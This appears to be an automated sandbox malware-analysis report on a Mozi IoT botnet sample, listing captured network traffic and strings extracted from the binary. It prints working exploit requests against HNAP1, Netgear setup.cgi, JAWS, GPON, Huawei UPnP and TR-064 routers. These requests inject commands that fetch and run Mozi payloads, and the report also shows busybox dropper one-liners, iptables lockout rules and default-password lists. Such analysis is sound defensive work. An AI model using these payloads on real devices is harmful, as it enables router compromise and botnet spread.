              Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 103.47.16.235:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: /tmp/i (PID: 4585)Socket: 0.0.0.0::57738
              Source: unknownTCP traffic detected without corresponding DNS query: 180.242.224.123
              Source: unknownTCP traffic detected without corresponding DNS query: 134.208.96.106
              Source: unknownTCP traffic detected without corresponding DNS query: 194.120.187.83
              Source: unknownTCP traffic detected without corresponding DNS query: 17.226.218.78
              Source: unknownTCP traffic detected without corresponding DNS query: 167.35.185.166
              Source: unknownTCP traffic detected without corresponding DNS query: 185.252.99.21
              Source: unknownTCP traffic detected without corresponding DNS query: 108.93.69.18
              Source: unknownTCP traffic detected without corresponding DNS query: 25.17.15.19
              Source: unknownTCP traffic detected without corresponding DNS query: 204.33.51.57
              Source: unknownTCP traffic detected without corresponding DNS query: 126.140.98.187
              Source: unknownTCP traffic detected without corresponding DNS query: 17.103.148.14
              Source: unknownTCP traffic detected without corresponding DNS query: 173.46.232.71
              Source: unknownTCP traffic detected without corresponding DNS query: 9.23.193.235
              Source: unknownTCP traffic detected without corresponding DNS query: 148.8.199.238
              Source: unknownTCP traffic detected without corresponding DNS query: 191.194.67.143
              Source: unknownTCP traffic detected without corresponding DNS query: 95.42.94.59
              Source: unknownTCP traffic detected without corresponding DNS query: 83.186.9.176
              Source: unknownTCP traffic detected without corresponding DNS query: 74.222.223.162
              Source: unknownTCP traffic detected without corresponding DNS query: 7.209.72.35
              Source: unknownTCP traffic detected without corresponding DNS query: 191.19.130.89
              Source: unknownTCP traffic detected without corresponding DNS query: 174.116.188.92
              Source: unknownTCP traffic detected without corresponding DNS query: 60.49.142.109
              Source: unknownTCP traffic detected without corresponding DNS query: 94.90.118.217
              Source: unknownTCP traffic detected without corresponding DNS query: 199.86.216.179
              Source: unknownTCP traffic detected without corresponding DNS query: 194.171.127.193
              Source: unknownTCP traffic detected without corresponding DNS query: 115.153.49.223
              Source: unknownTCP traffic detected without corresponding DNS query: 175.130.144.51
              Source: unknownTCP traffic detected without corresponding DNS query: 199.129.123.23
              Source: unknownTCP traffic detected without corresponding DNS query: 194.70.177.118
              Source: unknownTCP traffic detected without corresponding DNS query: 196.157.245.80
              Source: unknownTCP traffic detected without corresponding DNS query: 33.184.214.99
              Source: unknownTCP traffic detected without corresponding DNS query: 20.162.238.193
              Source: unknownTCP traffic detected without corresponding DNS query: 75.245.97.93
              Source: unknownTCP traffic detected without corresponding DNS query: 222.170.3.234
              Source: unknownTCP traffic detected without corresponding DNS query: 76.4.181.236
              Source: unknownTCP traffic detected without corresponding DNS query: 89.135.205.190
              Source: unknownTCP traffic detected without corresponding DNS query: 187.136.236.154
              Source: unknownTCP traffic detected without corresponding DNS query: 153.172.56.219
              Source: unknownTCP traffic detected without corresponding DNS query: 187.68.238.155
              Source: unknownTCP traffic detected without corresponding DNS query: 172.196.147.205
              Source: unknownTCP traffic detected without corresponding DNS query: 82.90.22.100
              Source: unknownTCP traffic detected without corresponding DNS query: 105.46.196.121
              Source: unknownTCP traffic detected without corresponding DNS query: 141.101.65.109
              Source: unknownTCP traffic detected without corresponding DNS query: 135.216.63.34
              Source: unknownTCP traffic detected without corresponding DNS query: 101.207.79.110
              Source: unknownTCP traffic detected without corresponding DNS query: 152.131.171.80
              Source: unknownTCP traffic detected without corresponding DNS query: 39.230.188.152
              Source: unknownTCP traffic detected without corresponding DNS query: 108.180.252.214
              Source: unknownTCP traffic detected without corresponding DNS query: 146.171.127.198
              Source: unknownTCP traffic detected without corresponding DNS query: 133.188.108.105
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 167.82.102.91:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 139.162.182.70:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.214.76.71:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 178.88.225.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 13.249.130.85:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: unknownDNS traffic detected: queries for: dht.transmissionbt.com
              Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
              Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=UTF-8Content-Length: 15312Connection: closeP3P: CP="CAO PSA OUR"Expires: Thu, 01 Jan 1970 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 31 33 39 2e 33 39 2e 31 34 30 2e 32 38 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 23 63 7b 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 6d 61 72 67 69 6e 3a 32 30 3b 70 61 64 64 69 6e 67 3a 32 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 0a 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 0a 68 32 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 7d 0a 68 31 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 63 6f 6c 6f 72 3a 23 63 63 30 30 30 30 3b 7d 0a 68 32 7b 63 6f 6c 6f 72 3a 23 33 33 30 30 36 36 3b 7d 0a 68 33 7b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 68 35 7b 6d 61 72 67 69 6e 3a 32 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 62 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 23 63 63 30 30 30 30 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0a 3c 64 69 76 20 69 64 3d 22 63 22 3e 0a 3c 68 31 3e 0a 3c 69 6d 67 20 77 69 64 74 68 3d 22 32 30 30 22 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 6a 70 65 67 3b 62 61 73 65 36 34 2c 2f 39 6a 2f 34 41 41 51 53 6b 5a 4a 52 67 41 42 41 67 41 41 5a 41 42 6b 41 41 44 2f 32 77 42 44 41 42 41 4c 43 77 73 4d 43 78 41 4d 44 42 41 58 44 77 30 50 46 78 73 55 45 42 41 55 47 78 38 58 46 78 63 58 46 78 38 65 46 78 6f 61 47 68 6f 58 48 68 34 6a 4a 53 63 6c 49 78 34 76 4c 7a 4d 7a 4c 79 39 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 44 2f 32 77 42 44 41 52 45 50 44 78 45 54 45 52 55 53 45 68 55 55 45 52 51 52 46 42 6f 55 46 68 59 55 47 69 59 61 47 68 77 61 47 69 59 77 49 78 34 65 48 68 34 6a 4d 43 73 75 4a 79 63 6e 4c 69 73 31 4e 54 41 77 4e 54 56 41 51 44 39 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 44 2f 77 41 41 52 43 41 44 43 41 4d 67 44 41 53 49 41 41 68 45 42 41 78 45 42 2f 38 51 41 47 77 41 41 41 51 55 42 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 44 42 41 55 47 41 51 66 2f 78 41 42 4a 45 41 41 43 41 51 4d 43 41 77 51 47 43 41 49 48 42 67 55 46 41 41 41 42 41 67 4d 41 42 42 45 46 45 69 45 78 51 52 4d 69 55 57 45 47 4d 6c 4a 78 63 6f 45 55 49 30 4b 52 6f
              Source: iString found in binary or memory: http://%s:%d/Mozi.a;chmod
              Source: iString found in binary or memory: http://%s:%d/Mozi.a;sh$
              Source: iString found in binary or memory: http://%s:%d/Mozi.m
              Source: iString found in binary or memory: http://%s:%d/Mozi.m;
              Source: iString found in binary or memory: http://%s:%d/Mozi.m;$
              Source: iString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
              Source: iString found in binary or memory: http://%s:%d/bin.sh
              Source: iString found in binary or memory: http://%s:%d/bin.sh;chmod
              Source: iString found in binary or memory: http://127.0.0.1
              Source: iString found in binary or memory: http://127.0.0.1sendcmd
              Source: iString found in binary or memory: http://HTTP/1.1
              Source: iString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
              Source: .config.6.drString found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
              Source: iString found in binary or memory: http://ipinfo.io/ip
              Source: alsa-info.sh0.6.drString found in binary or memory: http://pastebin.ca)
              Source: alsa-info.sh0.6.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
              Source: alsa-info.sh0.6.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
              Source: iString found in binary or memory: http://purenetworks.com/HNAP1/
              Source: iString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: iString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: iString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
              Source: alsa-info.sh0.6.drString found in binary or memory: http://www.alsa-project.org
              Source: alsa-info.sh0.6.drString found in binary or memory: http://www.alsa-project.org.
              Source: alsa-info.sh0.6.drString found in binary or memory: http://www.alsa-project.org/alsa-info.sh
              Source: alsa-info.sh0.6.drString found in binary or memory: http://www.alsa-project.org/cardinfo-db/
              Source: alsa-info.sh0.6.drString found in binary or memory: http://www.pastebin.ca
              Source: alsa-info.sh0.6.drString found in binary or memory: http://www.pastebin.ca.
              Source: alsa-info.sh0.6.drString found in binary or memory: http://www.pastebin.ca/upload.php
              Source: /tmp/i (PID: 4562)HTML file containing JavaScript created: /usr/networksJump to dropped file
              Source: Initial sampleString containing 'busybox' found: busybox
              Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
              Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
              Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
              Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
              Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
              Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
              Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
              Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
              Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
              Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
              Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
              Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
              Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
              Source: Initial sampleString containing potential weak password found: admin
              Source: Initial sampleString containing potential weak password found: default
              Source: Initial sampleString containing potential weak password found: support
              Source: Initial sampleString containing potential weak password found: service
              Source: Initial sampleString containing potential weak password found: supervisor
              Source: Initial sampleString containing potential weak password found: guest
              Source: Initial sampleString containing potential weak password found: administrator
